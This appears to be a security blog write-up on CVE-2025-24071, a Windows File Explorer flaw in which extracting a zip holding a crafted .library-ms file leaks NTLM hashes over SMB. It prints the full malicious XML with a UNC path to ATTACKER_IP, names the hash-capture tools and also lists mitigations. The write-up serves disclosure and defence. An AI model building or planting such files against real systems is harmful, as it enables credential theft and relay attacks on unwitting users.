17/12/25
CVE-2025-24071, File Explorer vulnerability expose the NTLM Hashes
Security Research: Windows File Explorer NTLM Hash Exposure
بِسْمِ اللَّهِ الرَّحْمَنِ الرَّحِيمِ
Overview
CVE-2025–24071 is a vulnerability in Windows File Explorer that allows unauthorized disclosure of NTLM hashes. When a user extracts a specially crafted .zip archive containing a malicious .library-ms file, Windows Explorer automatically parses the file and initiates an SMB authentication request to an attacker-controlled server, leaking the victim's NTLM hash without any additional user interaction.
Technical Deep Dive
The vulnerability exploits Windows Library files (.library-ms), which are XML-based configuration files that define virtual folders aggregating content from multiple locations. These files are automatically parsed by Windows Explorer without user interaction, making them an ideal vector for NTLM hash disclosure attacks.
How .library-ms Files Work:
Library files in Windows use XML structure to define searchable locations. They support both local paths and UNC (Universal Naming Convention) paths. The vulnerability arises when Windows Explorer processes a library file containing a UNC path to a remote SMB share—it automatically attempts to authenticate to that share, sending the user's NTLM credentials in the process.
Malicious .library-ms File Structure:
1<?xml version="1.0" encoding="UTF-8"?>
2<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
3 <name>@windows.storage.dll,-34582</name>
4 <version>6</version>
5 <isLibraryPinned>true</isLibraryPinned>
6 <iconReference>imageres.dll,-1003</iconReference>
7 <templateInfo>
8 <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
9 </templateInfo>
10 <searchConnectorDescriptionList>
11 <searchConnectorDescription>
12 <isDefaultSaveLocation>true</isDefaultSaveLocation>
13 <isSupported>false</isSupported>
14 <simpleLocation>
15 <url>\\ATTACKER_IP\share</url>
16 </simpleLocation>
17 </searchConnectorDescription>
18 </searchConnectorDescriptionList>
19</libraryDescription>The critical element is the <url> tag pointing to a UNC path (\\\\ATTACKER_IP\\share). When Windows Explorer processes this file, it automatically initiates an SMB connection to resolve the path, triggering NTLM authentication.
Why No User Interaction is Required:
Unlike traditional phishing attacks that require users to click links or open files, this vulnerability is triggered simply by extracting the archive and viewing the folder contents in Windows Explorer. The File Explorer's automatic parsing and preview functionality initiates the SMB request in the background, making it a zero-click vulnerability from the user's perspective after extraction.
NTLM Hash Capture Process:
When the victim's machine attempts to authenticate to the attacker's SMB server, it sends an NTLM authentication challenge-response. The attacker can capture this using tools like:
- Responder: A popular LLMNR, NBT-NS and MDNS poisoner with built-in SMB server
- Impacket's smbserver.py: Lightweight SMB server for hash capture
- Metasploit's auxiliary/server/capture/smb: SMB authentication capture module
References & Source Code:
- Microsoft Security Advisory: CVE-2025-24071 Official Advisory
- PoC Repository: Proof-of-concept exploits available on GitHub demonstrating .library-ms file creation and hash capture setup
- Responder Tool: github.com/lgandx/Responder
- Impacket SMB Server: github.com/fortra/impacket
⚠️ Security Note: This vulnerability has been patched by Microsoft. Always ensure your Windows systems are up-to-date with the latest security patches. The information provided here is for educational purposes only.
Affected Versions
- Windows 10 Version 1809 for x64-based Systems
- Windows 10 Version 1809 for 32-bit Systems
- Windows Server 2025 (Server Core installation)
- Windows Server 2025
- Windows Server 2012 R2 (Server Core installation)
- Windows Server 2012 R2
- Windows Server 2016 (Server Core installation)
- Windows Server 2016
- Windows 10 Version 1607 for x64-based Systems
- Windows 10 Version 1607 for 32-bit Systems
- Windows 10 for x64-based Systems
- Windows 10 for 32-bit Systems
- Windows 11 Version 24H2 for x64-based Systems
- Windows 11 Version 24H2 for ARM64-based Systems
- Windows Server 2022, 23H2 Edition (Server Core installation)
- Windows 11 Version 23H2 for x64-based Systems
- Windows 11 Version 23H2 for ARM64-based Systems
- Windows 10 Version 22H2 for 32-bit Systems
- Windows 10 Version 22H2 for ARM64-based Systems
- Windows 10 Version 22H2 for x64-based Systems
- Windows 11 Version 22H2 for x64-based Systems
- Windows 11 Version 22H2 for ARM64-based Systems
- Windows 10 Version 21H2 for x64-based Systems
- Windows 10 Version 21H2 for ARM64-based Systems
- Windows 10 Version 21H2 for 32-bit Systems
- Windows Server 2022 (Server Core installation)
- Windows Server 2022
- Windows Server 2019 (Server Core installation)
- Windows Server 2019
Exploitation Flow
- The attacker creates a malicious .library-ms file pointing to their SMB server
- Attacker packages the file into a .zip archive
- The victim extracts the archive on a Windows machine
- Windows Explorer automatically parses the .library-ms file
- SMB request is sent to the attacker's server with the victim's NTLM hash
- The attacker captures the hash using responder or impacket-smbserver for offline cracking or relay attacks
PoC
Exploitation Demo:
NTLM Hash Capture Demonstration
Mitigation
- Apply Microsoft security patches for CVE-2025–24071
- Block outbound SMB traffic (ports 445, 139) at the firewall
- Disable NTLM authentication where possible
- Use SMB signing to prevent relay attacks
- Educate users about the risks of extracting untrusted archives
That's it for this writeup, hope you enjoyed it and learned something new. See you in the next one!